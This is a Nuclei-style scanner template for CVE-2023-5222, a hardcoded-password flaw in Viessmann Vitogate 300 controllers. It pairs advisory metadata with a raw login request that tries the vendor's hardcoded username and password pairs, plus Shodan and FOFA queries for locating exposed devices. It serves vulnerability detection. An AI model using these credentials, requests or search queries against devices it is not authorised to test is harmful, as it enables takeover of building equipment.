id: CVE-2023-5222 info: name: Viessmann Vitogate 300 - Hardcoded Password author: ritikchaddha severity: critical description: | A critical vulnerability in Viessmann Vitogate 300 up to 2.1.3.0 allows attackers to authenticate using hardcoded credentials in the Web Management Interface. impact: | An attacker could potentially gain unauthorized access to the device. remediation: | Update the device firmware to remove the hardcoded password or change it to a strong, unique password. reference: - https://vuldb.com/?ctiid.240364 - https://vuldb.com/?id.240364 - https://nvd.nist.gov/vuln/detail/CVE-2023-5222 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-5222 cwe-id: CWE-259 epss-score: 0.00164 epss-percentile: 0.52433 cpe: cpe:2.3:o:viessmann:vitogate_300_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: title:"Vitogate 300" fofa-query: title="Vitogate 300" vendor: viessmann product: vitogate_300_firmware tags: cve,cve2023,viessmann,vitogate,default-login http: - raw: - | POST /cgi-bin/vitogate.cgi HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"method":"put","form":"form-login","params":{"uid":"{{username}}","pwd":"{{password}}"}} attack: pitchfork payloads: username: - vitomaster - vitogate password: - viessmann1917 - viessmann stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - 'admin":true' - '"sessionId":' condition: and - type: word part: content_type words: - 'application/json' - type: status status: - 200 # digest: 490a0046304402205e4d25f934e60a71c86c0383fc9ea75d3d60a8eab84da76ba0f74a428eebbfb302200b230092cf6e1e982cf44258fe996e03cf7df7774d8e291fea40c94e96f08950:922c64590222798bb761d5b6d8e72950